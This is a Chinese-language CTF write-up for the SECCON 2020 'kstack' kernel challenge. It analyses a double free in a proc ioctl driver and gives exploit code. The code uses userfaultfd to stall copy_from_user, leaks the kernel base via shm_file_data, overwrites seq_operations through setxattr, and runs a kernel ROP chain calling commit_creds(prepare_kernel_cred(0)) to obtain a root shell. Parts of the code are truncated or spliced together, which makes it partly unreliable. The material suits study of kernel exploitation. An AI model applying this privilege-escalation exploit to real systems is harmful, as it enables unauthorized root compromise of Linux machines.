SECCON-2020-kstack:userfaultfd + setxattr + double free
启动脚本
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-initrd ./rootfs.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr quiet" \
-cpu kvm64,+smep \
-net user -net nic -device e1000 \
-no-reboot \
-s \
-monitor /dev/null \
-nographic
题目
typedef struct _Element {
int owner;
unsigned long value;
struct _Element *fd;
} Element;
Element大小为24,kmalloc(sizeof(Element))分配进kmalloc-32的slab中
static long proc_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
Element *tmp, *prev;
int pid = task_tgid_nr(current);
switch(cmd) {
case CMD_PUSH:
tmp = kmalloc(sizeof(Element), GFP_KERNEL);
tmp->owner = pid;
tmp->fd = head;
head = tmp;
if (copy_from_user((void*)&tmp->value, (void*)arg, sizeof(unsigned long))) {
head = tmp->fd;
kfree(tmp);
return -EINVAL;
}
break;
case CMD_POP:
for(tmp = head, prev = NULL; tmp != NULL; prev = tmp, tmp = tmp->fd) {
if (tmp->owner == pid) {
if (copy_to_user((void*)arg, (void*)&tmp->value, sizeof(unsigned long)))
return -EINVAL;
if (prev) {
prev->fd = tmp->fd;
} else {
head = tmp->fd;
}
kfree(tmp);
break;
}
if (tmp->fd == NULL) return -EINVAL;
}
break;
}
return 0;
}
- CMD_PUSH,分配一个
Element,kmalloc-32 slab;并将用户层的值拷贝到Element->value,并将该slab链入单向链表中copy_from_user失败后- 会释放
Element,kfree(tmp); tmp是局部变量,未置NULL
- 会释放
- CMD_POP,将单向链表中,所有
Element->owner与调用进程pid相同的,全部释放掉,并将Element->value拷贝到用户空间- 如果
Element->value的值是有用的,但Element->value拷贝到用户空间,这个用户空间地址是不变的,如果拷贝多份,会被覆盖,所以考虑只拷贝一份出来,也就是链表中,只放入一个Element - 释放
Element,kfree(tmp); tmp未置NULL
- 如果
因为是题目,总会有解的,分析漏洞在哪里
1)CMD_PUSH正常,CMD_POP有问题吗?
CMD_POP,copy_to_user失败
proc_ioctl调用就直接退出了,没任意影响
case CMD_POP:
for(tmp = head, prev = NULL; tmp != NULL; prev = tmp, tmp = tmp->fd) {
if (tmp->owner == pid) {
if (copy_to_user((void*)arg, (void*)&tmp->value, sizeof(unsigned long)))
return -EINVAL; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
if (prev) {
prev->fd = tmp->fd;
} else {
head = tmp->fd;
}
kfree(tmp);
break;
}
if (tmp->fd == NULL) return -EINVAL;
}
CMD_POP,copy_to_user正常
单向链表指针正常调整
kfree(tmp);,tmp未置NULL,有利用方式吗?
- CMD_PUSH中,tmp会被重新初始化
tmp = kmalloc(sizeof(Element), GFP_KERNEL);,没啥问题 - CMD_POP中,for中的下一轮被重新赋值,没啥问题
case CMD_POP:
for(tmp = head, prev = NULL; tmp != NULL; prev = tmp, tmp = tmp->fd) {
if (tmp->owner == pid) {
if (copy_to_user((void*)arg, (void*)&tmp->value, sizeof(unsigned long)))
return -EINVAL;
if (prev) {
prev->fd = tmp->fd;
} else {
head = tmp->fd;
}
kfree(tmp); <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
break;
}
if (tmp->fd == NULL) return -EINVAL;
}
2)CMD_PUSH copy_from_user正常失败
- CMD_PUSH
- head = tmp->fd; head指向head自身
- kfree(tmp); 无用,在CMD_POP中重新赋值
- CMD_POP
- 第一轮for循环,tmp指向head,head->owner无数据,准备
prev = tmp, tmp = tmp->fd head->fd无内容,for循环结束
- 第一轮for循环,tmp指向head,head->owner无数据,准备
- 这看起来也没啥问题
case CMD_PUSH:
tmp = kmalloc(sizeof(Element), GFP_KERNEL);
tmp->owner = pid;
tmp->fd = head;
head = tmp;
if (copy_from_user((void*)&tmp->value, (void*)arg, sizeof(unsigned long))) { // 失败
head = tmp->fd; // 修正指针
kfree(tmp); // 释放掉
return -EINVAL;
}
case CMD_POP:
for(tmp = head, prev = NULL; tmp != NULL; prev = tmp, tmp = tmp->fd) {
if (tmp->owner == pid) {
if (copy_to_user((void*)arg, (void*)&tmp->value, sizeof(unsigned long)))
return -EINVAL;
if (prev) {
prev->fd = tmp->fd;
} else {
head = tmp->fd;
}
kfree(tmp);
break;
}
if (tmp->fd == NULL) return -EINVAL;
}
3)CMD_PUSH copy_from_user正常失败,并暂停住
- CMD_PUSH,copy_from_user失败并暂停住
- CMD_POP
- 可正常copy_to_user
- 可kfree
- CMD_PUSH,copy_from_user失败放开运行;执行kfree(tmp),产生double free
case CMD_PUSH:
tmp = kmalloc(sizeof(Element), GFP_KERNEL);
tmp->owner = pid;
tmp->fd = head;
head = tmp;
if (copy_from_user((void*)&tmp->value, (void*)arg, sizeof(unsigned long))) { // 失败,并暂停住
head = tmp->fd;
kfree(tmp);
return -EINVAL;
}
case CMD_POP:
for(tmp = head, prev = NULL; tmp != NULL; prev = tmp, tmp = tmp->fd) {
if (tmp->owner == pid) {
if (copy_to_user((void*)arg, (void*)&tmp->value, sizeof(unsigned long)))
return -EINVAL;
if (prev) {
prev->fd = tmp->fd;
} else {
head = tmp->fd;
}
kfree(tmp);
break;
}
if (tmp->fd == NULL) return -EINVAL;
}
看起来这种运行方式,通过userfaultfd或者fuse达成
详细分析CMD_PUSH copy_from_user正常失败,并暂停住
1)不能白白浪费CMD_POP中的可正常copy_to_user
- CMD_PUSH,copy_from_user失败并暂停住
- CMD_POP
- 可正常copy_to_user <<<<<<<<<<<<<<<<<<
- 可kfree
- CMD_PUSH,copy_from_user失败放开运行;执行kfree(tmp),产生double free
在上面整体运行的时候,可以先分配带有内核函数指针的kmalloc-32
1)分配带内核指针的kmalloc-32,slab-A
2)释放slab-A
3)CMD_PUSH,copy_from_user失败并暂停住(占据slab-A,且内容没有被污染)
4)CMD_POP
4-1)可正常copy_to_user (获取内核指针,获取内核基地址)
4-2)可kfree
5)CMD_PUSH,copy_from_user失败放开运行;执行kfree(tmp),产生double free
2)double-free的利用
分配:一个带有函数指针的内核结构体 slab-B
分配:分配时修改slab-B中的函数指针
触发:slab-B的函数指针
利用
exp1
- 分配并释放
shm_file_data - mmap地址addr,该地址被注册进userfaultfd
- push-
addr- 在 CMD_PUSH,copy_from_user处暂停
- pop,获取
shm_file_data->ipc_namespace,计算内核基地址 - 产生double-free的第一个free
- 修改addr的属性,
PROT_NONE,copy_from_user失败,产生double-free的第二个free
- double-free第一次分配:
open("proc/self/stat"),分配seq_operations - double-free第二次分配:setxattr,同时修改
seq_operations中的start为一个rop栈迁移 - 在栈迁移处布置rop
- 触发
seq_operations->start提权
#define _GNU_SOURCE
#include : mov rdi,rsp
0xffffffff81600a4d : mov rsp,QWORD PTR gs:0x5004
0xffffffff81600a56 : push QWORD PTR [rdi+0x30]
0xffffffff81600a59 : push QWORD PTR [rdi+0x28]
0xffffffff81600a5c : push QWORD PTR [rdi+0x20]
0xffffffff81600a5f : push QWORD PTR [rdi+0x18]
0xffffffff81600a62 : push QWORD PTR [rdi+0x10]
0xffffffff81600a65 : push QWORD PTR [rdi]
0xffffffff81600a67 : push rax
0xffffffff81600a68 : xchg ax,ax
0xffffffff81600a6a : mov rdi,cr3
0xffffffff81600a6d : jmp 0xffffffff81600aa3
0xffffffff81600a6f : mov rax,rdi
0xffffffff81600a72 : and rdi,0x7ff
*/
void *tmp_addr;
ulong tmp_buf = 0xdeadbeef;
int sfd;
unsigned long *fstack;
ulong *rop;
// save state
save_state();
// open target proc file
if ((fd = open("/proc/stack", O_RDONLY)) < 0)
errExit("open-/proc/stack");
// set userfaultfd
register_userfaultfd_and_halt();
sleep(1);
// 申请 shm_file_data 然后释放
call_shmat(); // kalloc and kfree shm_file_data structure at kmalloc-32
// 先申请,之前被释放的 shm_file_data ,然后写入数据,写入数据的时候,产生中断
// 页面处理中,通过_pop,读取之前shm_file_data结构体中的数据,最终得到kernel_base,并释放push申请的结构体(1-free)
// 再通过mprotect,使push中的copy_from_user,调用free,从而产生double free(2-free)
_push(addr); // invoke fault
// alloc seq_operations;
// double-free-1-alloc
if ((sfd = open("proc/self/stat", O_RDONLY)) == -1)
errExit("single_open");
// overwrite seq_operations;
char buf[0x20];
printf("[+] stack pivot gadget: %p\n", kernbase + stack_pivot);
for (int ix = 0; ix != 4; ++ix) // first 8byte is useless.
*(ulong *)(buf + ix * 8) = (kernbase + stack_pivot);
// double-free-2-alloc
setxattr("/tmp", "SHE_IS_SUMMER", buf, 0x20, XATTR_CREATE);
// alloc fake stack for 0x83C389C0
fstack = mmap(0x83C38000, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
if (fstack != 0x83C38000)
errExit("fstack");
/********** construct kROP ***************/
rop = (ulong *)0x83C389c0;
// Get cred of init task.
*rop++ = kernbase + pop_rdi;
*rop++ = 0;
*rop++ = kernbase + prepare_kernel_cred;
// Commit that cred.
*rop++ = kernbase + pop_rcx; // Cuz mov_rdi_rax gadget contains rep inst, set counter to 0.
*rop++ = 0;
*rop++ = kernbase + mov_rdi_rax;
*rop++ = 0; // fake rbp
*rop++ = kernbase + commit_creds;
// Return to usermode by swapgs_restore_regs_and_return_to_usermode
*rop++ = kernbase + swapgs_restore_regs_and_return_to_usermode;
*rop++ = 0;
*rop++ = 0;
*rop++ = (ulong)&pop_shell;
*rop++ = user_cs;
*rop++ = user_rflags;
*rop++ = user_sp;
*rop++ = user_ss;
// pop shell
read(sfd, buf, 0x10);
return 0;
}
exp2
- 获取内核基地址
- 通过两次pop实现double-free
- double-free第一次分配:open(“proc/self/stat”),分配seq_operations
- double-free第二次分配:setxattr,同时修改seq_operations中的start
- 与exp1的区别是使用,pt_regs 来完成 ROP
#include exp3
与exp1的区别,调整了一下内核基地址泄露和double-free的顺序
// gcc -static -pthread exp.c -g -o exp
#include exp4
userfaultfd的一种写法,很不好看
#include exp4
与exp1没啥区别
// https://ptr-yudai.hatenablog.com/entry/2020/10/11/213127
#include exp5-
看起来蛮有条理的一个写法
// https://blog.csdn.net/qq_61670993/article/details/133550788
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include 参考
https://blog.smallkirby.com/posts/kstack/
https://xz.aliyun.com/t/9469
https://www.cnblogs.com/pwnfeifei/p/16650533.html
https://blog.csdn.net/qq_61670993/article/details/133550788
http://brieflyx.me/2020/linux-tools/userfaultfd-internals/
https://www.anquanke.com/post/id/266898
https://www.roderickchan.cn/zh-cn/2022-04-28-seccon-2020-kstack/
https://gist.github.com/d4em0n/cd358e64ff956a772ebdb531a985ac2a
https://ptr-yudai.hatenablog.com/entry/2020/10/11/213127